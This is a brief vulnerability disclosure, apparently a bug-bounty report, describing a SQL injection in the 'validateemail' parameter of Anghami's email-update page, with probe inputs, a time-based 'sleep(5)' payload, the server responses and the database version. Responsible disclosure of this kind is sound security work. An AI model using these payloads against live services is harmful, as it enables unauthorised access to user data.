[https://www.anghami.com/updatemailinfo/] Sql Injection

Hi , I'd like to report a sql injection issue, first you need to be logged in in order to exploit this issue . The vulnerable parameter is **validateemail** . ####some tests [email protected]&phoneormail= => Please Check Your email to verify [email protected]'&phoneormail= => *message dissapeared [email protected]''&phoneormail= => Please Check Your email to verify [email protected]' or sleep(5) #&sid=0&lang=en&phoneormail= => server timeout ###POC db version : MySQL 5.0.11 you can find a screenshot from sqlmap scan confirming the issue . Thanks